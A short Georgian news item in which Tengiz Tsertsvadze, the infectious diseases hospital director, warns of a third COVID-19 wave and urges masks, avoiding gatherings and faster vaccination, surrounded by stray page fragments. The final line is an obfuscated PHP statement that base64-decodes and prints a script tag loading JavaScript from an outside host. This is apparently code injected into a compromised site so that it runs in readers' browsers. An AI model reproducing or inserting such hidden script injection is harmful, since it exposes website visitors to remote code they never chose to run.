celsiusi
ავერსი საქკაბელი
ინფექციური საავადმყოფოს დირექტორის, თენგიზ ცერცვაძის განცხადებით, თუ მესამე ტალღა დაიწყო, სიკვდილიანობას ერთნიშნა რიცხვზე ვერ შევინარჩუნებთ. ამის შესახებ მან იმედის ეთერში ისაუბრა.
 
"შეიძლება ვინმე შემეკამათოს, რომ მუდმივად სოლიდარობის გამოჩენა ამ თავშეკავებაში ძნელია. კიდევ ერთხელ გამოვიჩინოთ, შემთხვევებმა უკვე მოიმატა. საბედნიეროდ, ჯერ არ არის სიკვდილობის მატება. ამას უნდა გავუფრთხილდეთ, თორე, თუ დაიწყო მესამე ტალღა, სიკვდილობას ერთნიშნა რიცხვზე ვერ შევინარჩუნებთ.
 
დღეიდან მთელი მოსახლეობა უნდა გადავიდეს პირბადეების უპირობო გამოყენებაზე ღია და დახურულ სივრცეში. მოვახერხოთ და უახლოესი 2-3 თვის მანძილზე უარი ვთქვათ ხალხმრავალ შეკრებებზე. აი, ამას თუ შევძლებთ და დღეში 6-7 ათასი ვაქცინაცია გვექნება, ჩვენ თავიდან ავიცილებთ მესამე ტალღას", — თქვა მან.
 
2268
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");